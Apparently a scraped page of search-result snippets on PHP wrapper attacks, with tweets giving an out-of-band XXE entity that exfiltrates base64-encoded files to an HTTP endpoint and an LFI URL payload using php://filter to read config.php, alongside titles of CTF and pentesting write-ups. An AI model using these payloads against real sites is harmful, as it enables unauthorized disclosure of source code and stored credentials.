Jinwook Kim on Twitter: "Exploiting Out Of Band XXE using internal network and php wrappers <!ENTITY % data SYSTEM "php://filter/convert.base64- encode/resource=file:///D:/path/index.php"> ... exfil SYSTEM "http://target/endp.php?sid=[session_id ...
Adrian on Twitter: "Making use of an LFI vulnerability you can read the contents of any PHP file with this filter: http://example[.]com/index.php ?page=php://filter/read=convert.base64-encode/resource=config.php #LFI #LocalFileInclusion #Tip #Disclosure ...
Pwnlab_Init | hausec
Local file inclusion using PHP filter (Base64 encoding) – May 5, 2023
Local file inclusion vulnerability | by IndominusByte | Medium
PeeHagePee
Local file inclusion using PHP filter (Base64 encoding) – May 5, 2023
PHP Wrappers - Pentesting Web - Deep Hacking
Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021) | by Febi Mudiyanto | InfoSec Write-ups